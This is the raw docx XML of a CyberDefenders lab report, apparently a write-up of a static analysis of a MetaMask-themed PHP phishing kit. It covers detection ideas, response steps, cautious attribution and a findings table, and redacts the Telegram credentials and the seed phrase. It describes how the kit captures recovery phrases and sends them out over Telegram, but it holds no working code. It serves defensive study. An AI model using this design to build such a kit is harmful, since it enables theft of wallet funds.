      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Detect writes of credential-like content into log files beneath web-accessible directories.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Monitor outbound web-server requests to unexpected IP-geolocation services.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Detect pages requesting seed phrases outside approved wallet domains.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Block public access to log directories and other collection artifacts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Response Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="403" w:hanging="317"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:t>Take the phishing site offline while preserving a forensic copy of the hosting account.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="403" w:hanging="317"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:t>Revoke exposed bot credentials through an authorized process.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="403" w:hanging="317"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:t>Notify the impersonated wallet provider and relevant hosting or domain-abuse teams.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="403" w:hanging="317"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:t>Identify and notify victims through approved legal and incident-response channels.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="403" w:hanging="317"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:t>Treat every submitted recovery phrase as compromised and migrate affected funds to newly generated wallets.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="403" w:hanging="317"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r>
        <w:t>Preserve web-server, hosting, DNS, authentication, and access logs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="403" w:hanging="317"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">7. </w:t>
      </w:r>
      <w:r>
        <w:t>Hunt for related domains, certificates, IP addresses, source-code fingerprints, and reused identifiers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="403" w:hanging="317"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">8. </w:t>
      </w:r>
      <w:r>
        <w:t>Do not contact the actor or interact with the bot without explicit authorization.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Attribution Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>A developer-style alias appeared in a source-code comment. It may represent the author, distributor, another contributor, or a deliberately planted false flag. The artifact alone does not establish the developer's real-world identity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Evidence Required for Stronger Attribution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Reused code, comments, spelling patterns, and file structures across independent kits.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Shared domains, IP addresses, certificates, hosting accounts, or bot infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Provider records obtained through appropriate legal processes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Access logs that associate infrastructure management with a consistent source.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Payment, registration, or device evidence that corroborates the alias.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Seized systems containing matching source files, credentials, sessions, or deployment keys.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Confidence Statement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The alias is reported as an attribution clue with low confidence. It should not be presented as a confirmed person or threat-group identity without independent corroboration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Static analysis confirmed that the artifact was designed to capture wallet recovery phrases. The kit used a convincing MetaMask-themed interface, a PHP backend, online IP geolocation, Telegram-based exfiltration, and local append-only storage. The investigation also demonstrated why analysts must preserve evidence, avoid executing untrusted code, redact access credentials, and distinguish observed behavior from attribution claims.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Appendix Investigation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600"/>
            <w:shd w:fill="17365D"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Question</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6264"/>
            <w:shd w:fill="17365D"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Finding</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Impersonated wallet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6264"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>MetaMask</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F3F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Phishing code file</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6264"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F3F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>metamask.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Implementation language</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6264"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PHP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F3F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Machine-information service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6264"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F3F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Sypex Geo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Collected phrases</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6264"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F3F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Most recent phrase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6264"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F3F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Recovered from the final log entry; omitted here as credential material</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Credential-dumping medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6264"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Telegram</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F3F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Bot token</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6264"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F3F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Recovered; redacted</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Chat ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6264"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Recovered; redacted</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F3F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Developer allies clue</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6264"/>
            <w:vAlign w:val="center"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="100" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F3F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Alias recovered from a source-code comment; identity unverified</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Public Documentation Policy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The public GitHub version retains the investigative method and behavioral evidence while redacting Telegram access values. Original lab screenshots should be stored privately when they contain credentials or other sensitive values.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Alaa Zahra   |   CyberDefenders   |   Page </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
        <w:color w:val="5A5A5A"/>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GrabThePhisher Static Analysis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Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="17"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="FigureCaption">
    <w:name w:val="Figure Caption"/>
    <w:pPr>
      <w:keepNext w:val="0"/>
      <w:spacing w:before="60" w:after="180"/>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GrabThePhisher Static Analysis Investigation Report</dc:title>
  <dc:subject>CyberDefenders phishing kit static analysis</dc:subject>
  <dc:creator>Alaa Zahra</dc:creator>
  <cp:keywords>CyberDefenders, phishing, static analysis, PHP, Telegram, MetaMask, DFIR</cp:keywords>
  <dc:description>generated by python-docx</dc:description>
  <cp:lastModifiedBy/>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-12-23T23:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-12-23T23:15:00Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>